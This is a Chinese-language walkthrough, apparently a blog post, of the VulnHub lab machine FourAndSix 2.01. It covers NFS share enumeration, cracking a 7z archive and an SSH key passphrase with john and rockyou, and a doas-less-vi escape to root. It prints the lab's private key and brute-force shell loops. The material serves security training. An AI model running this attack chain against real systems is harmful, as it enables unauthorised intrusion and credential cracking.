vulnhub - FOURANDSIX
1 靶场详情
靶场名字:vulnhub - FOURANDSIX: 2.01
下载链接:https://download.vulnhub.com/fourandsix/FourAndSix2.ova1.1 描述
无
1.2 提示
成为root用户并读取/root/flag.txt
2 目标扫描
2.1 目标发现
┌──(kali㉿kali)-[~]
└─$ sudo nmap -sn 192.168.0.0/24
[sudo] password for kali:
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-13 10:11 EDT
Nmap scan report for 192.168.0.1
Host is up (0.00087s latency).
MAC Address: F4:2A:7D:52:0E:DA (Tp-link Technologies)
Nmap scan report for 192.168.0.102
Host is up (0.0010s latency).
MAC Address: 00:0C:29:A4:07:03 (VMware)
Nmap scan report for 192.168.0.107
Host is up.
Nmap done: 256 IP addresses (6 hosts up) scanned in 2.22 seconds根据对自己局域网的了解,目标靶机为192.168.0.102
2.2 扫描存活端口
┌──(kali㉿kali)-[~]
└─$ sudo nmap --min-rate 10000 -p- 192.168.0.102
[sudo] password for kali:
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-13 10:29 EDT
Warning: 192.168.0.102 giving up on port because retransmission cap hit (10).
Nmap scan report for 192.168.0.102
Host is up (0.00043s latency).
Not shown: 61921 filtered tcp ports (no-response), 3612 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
111/tcp open rpcbind
MAC Address: 00:0C:29:A4:07:03 (VMware)
Nmap done: 1 IP address (1 host up) scanned in 70.85 seconds开发的是22端口和111端口,111端口运行的rpcbind服务是是NFS中用来进行消息通知的服务,所以初步判断,扫漏了端口
再次扫描,得到结果
┌──(kali㉿kali)-[~]
└─$ sudo nmap --min-rate 10000 -p- 192.168.0.102
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-13 11:04 EDT
Warning: 192.168.0.102 giving up on port because retransmission cap hit (10).
Nmap scan report for 192.168.0.102
Host is up (0.00035s latency).
Not shown: 61720 filtered tcp ports (no-response), 3811 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
111/tcp open rpcbind
602/tcp open xmlrpc-beep
2049/tcp open nfs
MAC Address: 00:0C:29:A4:07:03 (VMware)
Nmap done: 1 IP address (1 host up) scanned in 70.72 seconds2.3 TCP扫描详细信息
┌──(kali㉿kali)-[~]
└─$ sudo nmap -sT -sC -sV -O -p22,111,602,2049 192.168.0.102
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-13 11:19 EDT
Nmap scan report for 192.168.0.102
Host is up (0.00022s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9 (protocol 2.0)
| ssh-hostkey:
| 2048 ef3b2ecf40199ebb231eaa24a1094ed1 (RSA)
| 256 c85c8b0be1640c75c363d7b380c92fd2 (ECDSA)
|_ 256 61bc459abaa5472060132519b047cbad (ED25519)
111/tcp open rpcbind 2 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2 111/tcp rpcbind
| 100000 2 111/udp rpcbind
| 100003 2,3 2049/tcp nfs
| 100003 2,3 2049/udp nfs
| 100005 1,3 602/tcp mountd
|_ 100005 1,3 701/udp mountd
602/tcp open mountd 1-3 (RPC #100005)
2049/tcp open nfs 2-3 (RPC #100003)
MAC Address: 00:0C:29:A4:07:03 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): OpenBSD 6.X|4.X|5.X|3.X (99%)
OS CPE: cpe:/o:openbsd:openbsd:6 cpe:/o:openbsd:openbsd:4.4 cpe:/o:openbsd:openbsd:5 cpe:/o:openbsd:openbsd:3
Aggressive OS guesses: OpenBSD 6.0 - 6.4 (99%), OpenBSD 6.1 (98%), OpenBSD 4.4 - 4.5 (96%), OpenBSD 4.2 - 4.4 (96%), OpenBSD 5.0 - 5.8 (96%), OpenBSD 5.5 (94%), OpenBSD 3.8 - 4.7 (93%), OpenBSD 4.9 - 5.1 (93%), OpenBSD 5.8 (93%), OpenBSD 5.9 (93%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 1 hop
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 15.70 seconds2.4 UDP扫描详细信息
┌──(kali㉿kali)-[~]
└─$ sudo nmap -sU -sC -sV -O -p22,111,602,2049 192.168.0.102
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-13 11:21 EDT
Nmap scan report for 192.168.0.102
Host is up (0.00029s latency).
PORT STATE SERVICE VERSION
22/udp closed ssh
111/udp open rpcbind 2 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2 111/tcp rpcbind
| 100000 2 111/udp rpcbind
| 100003 2,3 2049/tcp nfs
| 100003 2,3 2049/udp nfs
| 100005 1,3 602/tcp mountd
|_ 100005 1,3 701/udp mountd
602/udp closed xmlrpc-beep
2049/udp open nfs 2-3 (RPC #100003)
MAC Address: 00:0C:29:A4:07:03 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: OpenBSD 4.X|5.X|6.X
OS CPE: cpe:/o:openbsd:openbsd:4.1 cpe:/o:openbsd:openbsd:5 cpe:/o:openbsd:openbsd:6
OS details: OpenBSD 4.1, OpenBSD 4.2 - 4.4, OpenBSD 4.4 - 4.5, OpenBSD 5.0 - 5.8, OpenBSD 5.8, OpenBSD 6.0 - 6.4, OpenBSD 6.1
Network Distance: 1 hop
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 1.30 seconds3 nfs渗透
22端口的优先级靠后,首先我们查看一下靶机是否有nfs共享服务
┌──(kali㉿kali)-[~]
└─$ showmount -e 192.168.0.102
Export list for 192.168.0.102:
/home/user/storage (everyone) # 发现靶机提供了共享服务
┌──(kali㉿kali)-[~]
└─$ mkdir FourandSix # 创建该靶机文件夹方便归纳
┌──(kali㉿kali)-[~]
└─$ cd FourandSix
┌──(kali㉿kali)-[~/FourandSix]
└─$ mkdir 28
┌──(kali㉿kali)-[~/FourandSix]
└─$ sudo mount -t nfs 192.168.0.102:/home/user/storage 28 # 将共享的文件夹映射到28文件夹下
Created symlink /run/systemd/system/remote-fs.target.wants/rpc-statd.service → /lib/systemd/system/rpc-statd.service.
┌──(kali㉿kali)-[~/FourandSix]
└─$ cd 28
┌──(kali㉿kali)-[~/FourandSix/28]
└─$ ls
backup.7z # 映射查看发现文件
┌──(kali㉿kali)-[~/FourandSix/28]
└─$ cp backup.7z .. # 将文件拷贝到本地4 7Z暴力破解
4.1 判断文件属性
┌──(kali㉿kali)-[~/FourandSix]
└─$ file backup.7z
backup.7z: 7-zip archive data, version 0.4
┌──(kali㉿kali)-[~/FourandSix]
└─$ binwalk backup.7z
DECIMAL HEXADECIMAL DESCRIPTION
--------------------------------------------------------------------------------
0 0x0 7-zip archive data, version 0.44.2 尝试解压缩
# 尝试解压缩
┌──(kali㉿kali)-[~/FourandSix]
└─$ 7z x backup.7z
7-Zip [64] 16.02 : Copyright (c) 1999-2016 Igor Pavlov : 2016-05-21
p7zip Version 16.02 (locale=en_US.UTF-8,Utf16=on,HugeFiles=on,64 bits,32 CPUs AMD Ryzen 5 5600X 6-Core Processor (A20F10),ASM,AES-NI)
Scanning the drive for archives:
1 file, 62111 bytes (61 KiB)
Extracting archive: backup.7z
--
Path = backup.7z
Type = 7z
Physical Size = 62111
Headers Size = 303
Method = LZMA2:16 7zAES
Solid = +
Blocks = 1
Enter password (will not be echoed): # 需要密码,但是我们没有,随便输入几个,可以看到包内容
ERROR: Data Error in encrypted file. Wrong password? : hello1.jpeg
ERROR: Data Error in encrypted file. Wrong password? : hello2.png
ERROR: Data Error in encrypted file. Wrong password? : hello3.jpeg
ERROR: Data Error in encrypted file. Wrong password? : hello4.png
ERROR: Data Error in encrypted file. Wrong password? : hello5.jpeg
ERROR: Data Error in encrypted file. Wrong password? : hello6.png
ERROR: Data Error in encrypted file. Wrong password? : hello7.jpeg
ERROR: Data Error in encrypted file. Wrong password? : hello8.jpeg
ERROR: Data Error in encrypted file. Wrong password? : id_rsa
ERROR: Data Error in encrypted file. Wrong password? : id_rsa.pub
# 通过报错信息可以发现图片文件和秘钥文件
Sub items Errors: 10
Archives with Errors: 1
Sub items Errors: 104.3 破解7z密码
# 使用7z2john计算出hash文件
┌──(kali㉿kali)-[~/FourandSix]
└─$ 7z2john backup.7z > backup7z_hash
ATTENTION: the hashes might contain sensitive encrypted data. Be careful when sharing or posting these hashes
# 对hash进行破解 获取到明文密码chocolate
┌──(kali㉿kali)-[~/FourandSix]
└─$ john --format=7z --wordlist=/usr/share/wordlists/rockyou.txt backup7z_hash
Using default input encoding: UTF-8
Loaded 1 password hash (7z, 7-Zip archive encryption [SHA256 128/128 AVX 4x AES])
Cost 1 (iteration count) is 524288 for all loaded hashes
Cost 2 (padding size) is 0 for all loaded hashes
Cost 3 (compression type) is 2 for all loaded hashes
Cost 4 (data length) is 9488 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
chocolate (backup.7z)
1g 0:00:00:00 DONE (2023-03-13 21:10) 2.272g/s 72.72p/s 72.72c/s 72.72C/s 654321..butterfly
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
# 再次进行解压吗,没有任何问题
┌──(kali㉿kali)-[~/FourandSix]
└─$ 7z x backup.7z
7-Zip [64] 16.02 : Copyright (c) 1999-2016 Igor Pavlov : 2016-05-21
p7zip Version 16.02 (locale=en_US.UTF-8,Utf16=on,HugeFiles=on,64 bits,32 CPUs AMD Ryzen 5 5600X 6-Core Processor (A20F10),ASM,AES-NI)
Scanning the drive for archives:
1 file, 62111 bytes (61 KiB)
Extracting archive: backup.7z
--
Path = backup.7z
Type = 7z
Physical Size = 62111
Headers Size = 303
Method = LZMA2:16 7zAES
Solid = +
Blocks = 1
Enter password (will not be echoed):
Everything is Ok
Files: 10
Size: 64066
Compressed: 62111
# 查看文件
┌──(kali㉿kali)-[~/FourandSix]
└─$ ls
28 backup7z_hash hello2.png hello4.png hello6.png hello8.jpeg id_rsa.pub
backup.7z hello1.jpeg hello3.jpeg hello5.jpeg hello7.jpeg id_rsatips:
┌──(kali㉿kali)-[~/FourandSix]
└─$ 7z2john backup.7z > backup7z_hash
Can't locate Compress/Raw/Lzma.pm in @INC (you may need to install the Compress::Raw::Lzma module) (@INC contains: /etc/perl /usr/local/lib/x86_64-linux-gnu/perl/5.36.0 /usr/local/share/perl/5.36.0 /usr/lib/x86_64-linux-gnu/perl5/5.36 /usr/share/perl5 /usr/lib/x86_64-linux-gnu/perl-base /usr/lib/x86_64-linux-gnu/perl/5.36 /usr/share/perl/5.36 /usr/local/lib/site_perl) at /usr/bin/7z2john line 6.
BEGIN failed--compilation aborted at /usr/bin/7z2john line 6.这个错误提示是缺少 Compress::Raw::Lzma 模块,你需要先安装这个模块,然后再尝试运行 7z2john。在 Kali Linux 中,你可以使用以下命令安装该模块:
csharp
sudo apt-get install libcompress-raw-lzma-perl这个命令将会安装 libcompress-raw-lzma-perl 包,这个包包含了 Compress::Raw::Lzma 模块。安装完成后,再运行 7z2john 命令应该就可以正常工作了
4.4 查看图片内容
┌──(kali㉿kali)-[~/FourandSix]
└─$ xdg-open hello1.jpeg # 打开kali的图片查看软件
外观未发现有啥异常
# 查看文件属性
┌──(kali㉿kali)-[~/FourandSix]
└─$ file hello*.*
hello1.jpeg: JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 258x195, components 3
hello2.png: PNG image data, 257 x 196, 8-bit colormap, non-interlaced
hello3.jpeg: JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 227x222, components 3
hello4.png: PNG image data, 206 x 244, 8-bit colormap, non-interlaced
hello5.jpeg: JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 226x223, components 3
hello6.png: PNG image data, 177 x 232, 8-bit colormap, non-interlaced
hello7.jpeg: JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 282x179, components 3
hello8.jpeg: JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 204x248, components 3
# 查看捆绑
┌──(kali㉿kali)-[~/FourandSix]
└─$ binwalk hello*.*
Scan Time: 2023-03-13 21:24:05
Target File: /home/kali/FourandSix/hello1.jpeg
MD5 Checksum: 36fd4beda9c0762f4f224150cd67ab07
Signatures: 411
DECIMAL HEXADECIMAL DESCRIPTION
--------------------------------------------------------------------------------
0 0x0 JPEG image data, JFIF standard 1.01
Scan Time: 2023-03-13 21:24:05
Target File: /home/kali/FourandSix/hello2.png
MD5 Checksum: 36e1d982cfec8d61094bb630bf36c828
Signatures: 411
DECIMAL HEXADECIMAL DESCRIPTION
--------------------------------------------------------------------------------
0 0x0 PNG image, 257 x 196, 8-bit colormap, non-interlaced
263 0x107 Zlib compressed data, default compression
Scan Time: 2023-03-13 21:24:05
Target File: /home/kali/FourandSix/hello3.jpeg
MD5 Checksum: 21116e89ae3a6b52ca9a88a4d2b4aa9f
Signatures: 411
DECIMAL HEXADECIMAL DESCRIPTION
--------------------------------------------------------------------------------
0 0x0 JPEG image data, JFIF standard 1.01
Scan Time: 2023-03-13 21:24:05
Target File: /home/kali/FourandSix/hello4.png
MD5 Checksum: 0d8a3ad296f250880dac19e670be01f2
Signatures: 411
DECIMAL HEXADECIMAL DESCRIPTION
--------------------------------------------------------------------------------
0 0x0 PNG image, 206 x 244, 8-bit colormap, non-interlaced
431 0x1AF Zlib compressed data, default compression
Scan Time: 2023-03-13 21:24:05
Target File: /home/kali/FourandSix/hello5.jpeg
MD5 Checksum: 51dabdddaf964782a9871b6d98d3ffec
Signatures: 411
DECIMAL HEXADECIMAL DESCRIPTION
--------------------------------------------------------------------------------
0 0x0 JPEG image data, JFIF standard 1.01
Scan Time: 2023-03-13 21:24:05
Target File: /home/kali/FourandSix/hello6.png
MD5 Checksum: ce9003ed057a2c2c718915aba5d71e17
Signatures: 411
DECIMAL HEXADECIMAL DESCRIPTION
--------------------------------------------------------------------------------
0 0x0 PNG image, 177 x 232, 8-bit colormap, non-interlaced
296 0x128 Zlib compressed data, default compression
Scan Time: 2023-03-13 21:24:05
Target File: /home/kali/FourandSix/hello7.jpeg
MD5 Checksum: e3a266075a99ab85f9e06523dd135c0a
Signatures: 411
DECIMAL HEXADECIMAL DESCRIPTION
--------------------------------------------------------------------------------
0 0x0 JPEG image data, JFIF standard 1.01
Scan Time: 2023-03-13 21:24:05
Target File: /home/kali/FourandSix/hello8.jpeg
MD5 Checksum: 392e26dcb3e0f9a58fa49fcdc61c5e40
Signatures: 411
DECIMAL HEXADECIMAL DESCRIPTION
--------------------------------------------------------------------------------
0 0x0 JPEG image data, JFIF standard 1.01
## 有md5值有签名,没发现捆绑
# 查看文件的注释信息
┌──(kali㉿kali)-[~/FourandSix]
└─$ exiftool hello*.*
======== hello1.jpeg
ExifTool Version Number : 12.49
File Name : hello1.jpeg
Directory : .
File Size : 9.0 kB
File Modification Date/Time : 2018:10:28 04:45:33-04:00
File Access Date/Time : 2023:03:13 21:14:04-04:00
File Inode Change Date/Time : 2023:03:13 21:11:51-04:00
File Permissions : -rw-r--r--
File Type : JPEG
File Type Extension : jpg
MIME Type : image/jpeg
JFIF Version : 1.01
Resolution Unit : None
X Resolution : 1
Y Resolution : 1
Image Width : 258
Image Height : 195
Encoding Process : Baseline DCT, Huffman coding
Bits Per Sample : 8
Color Components : 3
Y Cb Cr Sub Sampling : YCbCr4:4:4 (1 1)
Image Size : 258x195
Megapixels : 0.050
======== hello2.png
ExifTool Version Number : 12.49
File Name : hello2.png
Directory : .
File Size : 5.2 kB
File Modification Date/Time : 2018:10:28 04:45:33-04:00
File Access Date/Time : 2023:03:13 21:14:04-04:00
File Inode Change Date/Time : 2023:03:13 21:11:51-04:00
File Permissions : -rw-r--r--
File Type : PNG
File Type Extension : png
MIME Type : image/png
Image Width : 257
Image Height : 196
Bit Depth : 8
Color Type : Palette
Compression : Deflate/Inflate
Filter : Adaptive
Interlace : Noninterlaced
Palette : (Binary data 210 bytes, use -b option to extract)
Image Size : 257x196
Megapixels : 0.050
======== hello3.jpeg
ExifTool Version Number : 12.49
File Name : hello3.jpeg
Directory : .
File Size : 8.9 kB
File Modification Date/Time : 2018:10:28 04:45:33-04:00
File Access Date/Time : 2023:03:13 21:14:04-04:00
File Inode Change Date/Time : 2023:03:13 21:11:51-04:00
File Permissions : -rw-r--r--
File Type : JPEG
File Type Extension : jpg
MIME Type : image/jpeg
JFIF Version : 1.01
Resolution Unit : None
X Resolution : 1
Y Resolution : 1
Image Width : 227
Image Height : 222
Encoding Process : Baseline DCT, Huffman coding
Bits Per Sample : 8
Color Components : 3
Y Cb Cr Sub Sampling : YCbCr4:4:4 (1 1)
Image Size : 227x222
Megapixels : 0.050
======== hello4.png
ExifTool Version Number : 12.49
File Name : hello4.png
Directory : .
File Size : 8.3 kB
File Modification Date/Time : 2018:10:28 04:45:33-04:00
File Access Date/Time : 2023:03:13 21:14:04-04:00
File Inode Change Date/Time : 2023:03:13 21:11:51-04:00
File Permissions : -rw-r--r--
File Type : PNG
File Type Extension : png
MIME Type : image/png
Image Width : 206
Image Height : 244
Bit Depth : 8
Color Type : Palette
Compression : Deflate/Inflate
Filter : Adaptive
Interlace : Noninterlaced
Palette : (Binary data 378 bytes, use -b option to extract)
Image Size : 206x244
Megapixels : 0.050
======== hello5.jpeg
ExifTool Version Number : 12.49
File Name : hello5.jpeg
Directory : .
File Size : 10 kB
File Modification Date/Time : 2018:10:28 04:45:33-04:00
File Access Date/Time : 2023:03:13 21:14:04-04:00
File Inode Change Date/Time : 2023:03:13 21:11:51-04:00
File Permissions : -rw-r--r--
File Type : JPEG
File Type Extension : jpg
MIME Type : image/jpeg
JFIF Version : 1.01
Resolution Unit : None
X Resolution : 1
Y Resolution : 1
Image Width : 226
Image Height : 223
Encoding Process : Baseline DCT, Huffman coding
Bits Per Sample : 8
Color Components : 3
Y Cb Cr Sub Sampling : YCbCr4:4:4 (1 1)
Image Size : 226x223
Megapixels : 0.050
======== hello6.png
ExifTool Version Number : 12.49
File Name : hello6.png
Directory : .
File Size : 5.9 kB
File Modification Date/Time : 2018:10:28 04:45:33-04:00
File Access Date/Time : 2023:03:13 21:14:04-04:00
File Inode Change Date/Time : 2023:03:13 21:11:51-04:00
File Permissions : -rw-r--r--
File Type : PNG
File Type Extension : png
MIME Type : image/png
Image Width : 177
Image Height : 232
Bit Depth : 8
Color Type : Palette
Compression : Deflate/Inflate
Filter : Adaptive
Interlace : Noninterlaced
Palette : (Binary data 243 bytes, use -b option to extract)
Image Size : 177x232
Megapixels : 0.041
======== hello7.jpeg
ExifTool Version Number : 12.49
File Name : hello7.jpeg
Directory : .
File Size : 6.2 kB
File Modification Date/Time : 2018:10:28 04:45:33-04:00
File Access Date/Time : 2023:03:13 21:14:16-04:00
File Inode Change Date/Time : 2023:03:13 21:11:51-04:00
File Permissions : -rw-r--r--
File Type : JPEG
File Type Extension : jpg
MIME Type : image/jpeg
JFIF Version : 1.01
Resolution Unit : None
X Resolution : 1
Y Resolution : 1
Image Width : 282
Image Height : 179
Encoding Process : Baseline DCT, Huffman coding
Bits Per Sample : 8
Color Components : 3
Y Cb Cr Sub Sampling : YCbCr4:2:0 (2 2)
Image Size : 282x179
Megapixels : 0.050
======== hello8.jpeg
ExifTool Version Number : 12.49
File Name : hello8.jpeg
Directory : .
File Size : 8.2 kB
File Modification Date/Time : 2018:10:28 04:45:33-04:00
File Access Date/Time : 2023:03:13 21:14:16-04:00
File Inode Change Date/Time : 2023:03:13 21:11:51-04:00
File Permissions : -rw-r--r--
File Type : JPEG
File Type Extension : jpg
MIME Type : image/jpeg
JFIF Version : 1.01
Resolution Unit : None
X Resolution : 1
Y Resolution : 1
Image Width : 204
Image Height : 248
Encoding Process : Baseline DCT, Huffman coding
Bits Per Sample : 8
Color Components : 3
Y Cb Cr Sub Sampling : YCbCr4:2:0 (2 2)
Image Size : 204x248
Megapixels : 0.051
8 image files read5 私钥暴力破解
打开压缩包,除了图片我们还获取了id_rsa.pub 和id_rsa文件,这两个都应该是ssh的密钥
┌──(kali㉿kali)-[~/FourandSix]
└─$ file id_rsa*
id_rsa: OpenSSH private key
id_rsa.pub: OpenSSH RSA public key打开看一下内容
# 公钥 获取到了user@fourandsix2用户
┌──(kali㉿kali)-[~/FourandSix]
└─$ cat id_rsa.pub
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDClNemaX//nOugJPAWyQ1aDMgfAS8zrJh++hNeMGCo+TIm9UxVUNwc6vhZ8apKZHOX0Ht+MlHLYdkbwSinmCRmOkm2JbMYA5GNBG3fTNWOAbhd7dl2GPG7NUD+zhaDFyRk5gTqmuFumECDAgCxzeE8r9jBwfX73cETemexWKnGqLey0T56VypNrjvueFPmmrWCJyPcXtoLNQDbbdaWwJPhF0gKGrrWTEZo0NnU1lMAnKkiooDxLFhxOIOxRIXWtDtc61cpnnJHtKeO+9wL2q7JeUQB00KLs9/iRwV6b+kslvHaaQ4TR8IaufuJqmICuE4+v7HdsQHslmIbPKX6HANn user@fourandsix2
# 私钥
┌──(kali㉿kali)-[~/FourandSix]
└─$ cat id_rsa
-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAACmFlczI1Ni1jdHIAAAAGYmNyeXB0AAAAGAAAABCmv/BkXU
N5gfqui9Z/92KAAAAAEAAAAAEAAAEXAAAAB3NzaC1yc2EAAAADAQABAAABAQDClNemaX//
nOugJPAWyQ1aDMgfAS8zrJh++hNeMGCo+TIm9UxVUNwc6vhZ8apKZHOX0Ht+MlHLYdkbwS
inmCRmOkm2JbMYA5GNBG3fTNWOAbhd7dl2GPG7NUD+zhaDFyRk5gTqmuFumECDAgCxzeE8
r9jBwfX73cETemexWKnGqLey0T56VypNrjvueFPmmrWCJyPcXtoLNQDbbdaWwJPhF0gKGr
rWTEZo0NnU1lMAnKkiooDxLFhxOIOxRIXWtDtc61cpnnJHtKeO+9wL2q7JeUQB00KLs9/i
RwV6b+kslvHaaQ4TR8IaufuJqmICuE4+v7HdsQHslmIbPKX6HANnAAADwAO39g1ZtgarNJ
4hcnHTgx/DLgDeet1AhvBBsVjk94i8WLhy0luUvigJcMwHY6MgxL/ZNJfe3cZZ2/Rpo5g5
j5fzQ8vBHlglN9Z1GPVmeKdUHpRzrLFuARQOitYiWn9suwVafhgTS1hAof3Fqsik3pogEn
qp9pm39lalPVNgNVj6HCr2iJ0iq/MXjAmbgYxvpYXhzjyGzfPRlsw3y1T0pIxq3y9AzVBz
BCWF9x/GS1mXiDvGbNyb21ymn+NJq1eZKBN2LGJOHV2v+GGBkRTIYDsUpRbN56OJgu7Fyk
sECQIARA3ngs7tJhkGwtU7tIihiw/JlRtNu3GZwEsd5RVyX6cK8xGuaqlUulmm5E1CnxXz
3zj8MNhZtpDJaTpda83BhkxkSYb2svJ5rqO8HTYX2XtvPBEAN3U/dbcYVwNIdJ77TmckvS
tqvWi+DlZ6SL5Jlsj3WIFwXrmSIUQATA0jcF4d/FOoYOFTAQJ1y2pm97Q8UCErizu+SjfR
yQ7Q7QERsuAWBKthTGWkmzWKTYG8cpKso4lwbbjKJapfovEDtJgtFZpaX2+2YMMBx5AtaU
wNJShNYfIan4d8E2l6R77bBjqff4Qk1EMZzyXhG/Qe63buiCpUk6EevAf5Z2LXHJa4JYW3
PVcSXL3pbAOKEt6c36Q7CMHLmgOR9Be9wU/G+0FkDhdcgdkfOHaROfbK+RLhZ9tMO2peFP
POba2/Mw/kIK2Tepw7dQMvZ8KU+rBISeTE0YoSNYpt5A7ClskeLsXh9KCA/6Glnw+xKS+K
ewK2ooDck0EwHUmVQqC4qkXzbPbcj37WwMO3mzcQo7MARluOX8Y5b6JReqdhzvM5S7/uOb
cIblXwq9h71gTPirzhnn9QaJ/DnbGX4Ww7m8nkFkf9qwghWM+vKMjTxGSFHFXubk8l+5CG
fAOYC1igZMjKO5+2u60LMhtPjkGdUMbq0hv2FCxZW1ajlGwZIYWs2MLW7LGVSwC7re+fM2
1RaMxWvn73VjjooB+7hexe7l35mr5TyaZcQKCtJSNQRrGsSxHLUTEtvLY9FHOCnLgcsUzi
Tm826t9dvsrYHJh8W/wSqSYQ9t1niLg2MulioK6H8FTDAupkhZUkkbL0FEbe+Dl3cIeUW6
nXgaf6F+9tQHNQCI9QT1a/kGSGgQRRjuSdmVZieqdafJ7jHavLjzjcsiKQtjzkyaCp1hpa
dS6IZqF9DzlbtJRNlrO6Tq3j7gtL4DCURx2Jq13JO1hWDffIyrRZfgGeovGK/UAbTeTQ9M
rPy1AS6A==
-----END OPENSSH PRIVATE KEY-----5.1 尝试已知密钥进行登录
┌──(kali㉿kali)-[~/FourandSix]
└─$ sudo ssh -i id_rsa user@192.168.0.102
[sudo] password for kali:
The authenticity of host '192.168.0.102 (192.168.0.102)' can't be established.
ED25519 key fingerprint is SHA256:bYL1jAzqEuvAJUa0fNrhsGN1637L223ZIavvbfsCL0g.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.0.102' (ED25519) to the list of known hosts.
Enter passphrase for key 'id_rsa': 我们发现导入私钥后还是需要密码,所以私钥也是加密的
5.2 破解私钥密码
┌──(kali㉿kali)-[~/FourandSix]
└─$ ssh2john id_rsa > id_rsa_hash
# 由于我们不知道密码文件的格式类型,所以john自己查找
┌──(kali㉿kali)-[~/FourandSix]
└─$ sudo john --wordlist=/usr/share/wordlists/rockyou.txt id_rsa_hash
Created directory: /root/.john
Using default input encoding: UTF-8
Loaded 1 password hash (SSH, SSH private key [RSA/DSA/EC/OPENSSH 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 2 for all loaded hashes
Cost 2 (iteration count) is 16 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
12345678 (id_rsa)
1g 0:00:00:00 DONE (2023-03-13 21:40) 1.136g/s 36.36p/s 36.36c/s 36.36C/s 123456..butterfly
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
# 尝试登录
┌──(kali㉿kali)-[~/FourandSix]
└─$ sudo ssh -i id_rsa user@192.168.0.102
Enter passphrase for key 'id_rsa':
Last login: Mon Oct 29 13:53:51 2018 from 192.168.1.114
OpenBSD 6.4 (GENERIC) #349: Thu Oct 11 13:25:13 MDT 2018
Welcome to OpenBSD: The proactively secure Unix-like operating system.
Please use the sendbug(1) utility to report bugs in the system.
Before reporting a bug, please try to reproduce it with the latest
version of the code. With bug reports, please try to ensure that
enough information to reproduce the problem is enclosed, and if a
known fix for it exists, include that as well.
fourandsix2$ whoami
user
fourandsix2$ pwd
/home/user
fourandsix2$ tips:
john --list=formats | grep ssh # 查找ssh相关的密码文件格式类型(有很多)6 提权
6.1 查看系统环境
fourandsix2$ whoami # 当前用户
user
fourandsix2$ pwd # 当前路径
/home/user
fourandsix2$ id
uid=1000(user) gid=1000(user) groups=1000(user), 0(wheel)
fourandsix2$ uname
OpenBSD
fourandsix2$ uname -a
OpenBSD fourandsix2.localdomain 6.4 GENERIC#349 amd64
# 防火墙或者网络设备的应用喜欢用openbsd
fourandsix2$ find / -group user -type f 2>/dev/null
# find 查找 -group 属于user用户组的文件 -type f 查找普通文件 2>/dev/null将错误信息重定向来屏蔽
/home/user/.ssh/authorized_keys
/home/user/.Xdefaults
/home/user/.cshrc
/home/user/.cvsrc
/home/user/.login
/home/user/.mailrc
/home/user/.profile
/home/user/storage/backup.7z
/var/mail/user
fourandsix2$ find / -perm -u=s -type f 2>/dev/null
# "-perm -u=s"表示匹配权限位中设置了setuid位的文件
# 即匹配当前用户uid可执行的文件
/usr/bin/chfn
/usr/bin/chpass
/usr/bin/chsh
/usr/bin/doas
# /usr/bin/doas 是一个简单的 Unix 特权升级工具,类似于 sudo 命令,允许普通用户以特权用户的身份执行特定的命令
/usr/bin/lpr
/usr/bin/lprm
/usr/bin/passwd
/usr/bin/su
/usr/libexec/lockspool
/usr/libexec/ssh-keysign
/usr/sbin/authpf
/usr/sbin/authpf-noip
/usr/sbin/pppd
/usr/sbin/traceroute
/usr/sbin/traceroute6
/sbin/ping
/sbin/ping6
/sbin/shutdown
fourandsix2$ cat /etc/doas.conf # doas的配置文件
permit nopass keepenv user as root cmd /usr/bin/less args /var/log/authlog
## 这条规则允许用户 user 以特权用户 root 的身份使用 /usr/bin/less 查看 /var/log/authlog 文件,而不需要输入密码。同时,由于使用了 keepenv 关键字,这个命令会使用用户 user 的环境变量,而不是 root 用户的环境变量
permit nopass keepenv root as root6.2 doas提权
fourandsix2$ doas /usr/bin/less /var/log/authlog 
less不具备编辑功能,但是按v会启动vi进行编辑,这时候的vi也是sudo权限的,所以用vi启动sh
发现命令提示符以及变为了#,whoami发现已经是root用户了
fourandsix2# whoami
root
fourandsix2# cd /root
fourandsix2# ls
.Xdefaults .cshrc .cvsrc .forward .login .profile .ssh flag.txt
fourandsix2# cat flag.txt
Nice you hacked all the passwords!
Not all tools worked well. But with some command magic...:
cat /usr/share/wordlists/rockyou.txt|while read line; do 7z e backup.7z -p"$line" -oout; if grep -iRl SSH; then echo $line; break;fi;done
cat /usr/share/wordlists/rockyou.txt|while read line; do if ssh-keygen -p -P "$line" -N password -f id_rsa; then echo $line; break;fi;done
Here is the flag:
acd043bc3103ed3dd02eee99d5b0ff42vulnhub - FOURANDSIX
http://localhost:8080/archives/vulnhub---fourandsix